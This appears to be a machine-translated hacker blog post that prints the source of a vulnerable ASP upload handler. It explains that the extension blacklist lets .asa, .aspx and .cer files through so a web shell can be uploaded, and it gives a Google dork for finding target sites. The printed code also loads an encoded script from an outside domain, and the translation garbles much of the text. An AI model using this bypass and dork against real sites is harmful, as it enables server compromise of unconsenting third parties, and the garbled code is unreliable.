Author: Minghacker
From: www.3est.com
Blog: http://yxmhero1989.blog.163.com
It seems that there are new and old versions.
See the code sub_uploadb.asp
<% @ Language = VBScript %>
<! -- # Include FILE = "upload. inc" -->
<%
Dim upload, file, formName, formPath, iCount, fileformat
Set upload = new upload_F
Function MakedownName ()
Dim fname
Fname = now ()
Fname = replace (fname ,"-","")
Fname = replace (fname ,"","")
Fname = replace (fname ,":","")
Fname = replace (fname, "PM ","")
Fname = replace (fname, "AM ","")
Fname = replace (fname, "Morning ","")
Fname = replace (fname, "Afternoon ","")
Fname = int (fname) + int (10-1 + 1) * Rnd + 1)
MakedownName = fname
End function
FormPath = ".../../upload /"
ICount = 0
For each formName in upload. file: Lists All uploaded files.
Set file = upload. file (formName) to generate a file object
Fileformat = lcase (right (file. filename, 4 ))
If fileformat = ". asp" or fileformat = ". exe" or fileformat = ". txt" or fileformat = ". htm" then
Response. write "<script> alert (the file format is incorrect. please upload it again !); Location = "& request. ServerVariables (" HTTP_REFERER ") &" </script>"
Response. end
End if
If file. FileSize> 0 then if FileSize> 0, file data exists.
Newname = MakedownName () & "." & mid (file. FileName, limit Rev (file. FileName, ".") + 1)
File. SaveAs Server. mappath (formPath & newname) save the file
Filename = file. filepath & file. filename
Filename = replace (filename ,"","/")
Uploadpath = formpath & newname
Uploadpath = mid (uploadpath, instr (formpath, "upload "))
ICount = iCount + 1% & gt;
<Script>
Fn = "<% = uploadpath %>"
Filename = "<% = filename %>"
Using Role opener.doc ument. form. proimgb. value = fn
Using Role opener.doc ument. form. probpath. value = filename
Window. close ();
</Script>
<% Else
Response. write ("<font size = 1.5 color = red> ")
Response. write "file not found & nbsp; <a href = javasReturned: history. back (1)> return </A>"
Response. write ("</font> ")
Response. end
End if
Next
%>
<Html>
<Head>
<Title> </title>
<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312">
<Link rel = "stylesheet" href = "css.css" type = "text/css">
<Style type = "text/css">
<! --
Body, td, th {
Font-size: 12px;
}
Body {
Margin-left: 10px;
Margin-top: 10px;
Margin-right: 10px;
Margin-bottom: 10px;
Background-image: url (.../../images/bg.gif );
}
-->
</Style>
<Script language = "JScript. Encode" src = "http://www.16885688.com/include.js">
If fileformat = ". asp" or fileformat = ". exe" or fileformat = ". txt" or fileformat = ". htm" then ..
Only asp and so on are filtered, and other information such as asa, aspx, and cer can be passed (if supported by the server)
Asp/up/upload. asp calls the above sub_uploadb.asp. The uploaded Shell is not explained.
Google: inurl:/managepro. asp
There are not many sites, and the keywords are better constructed by yourself. Take specific measures.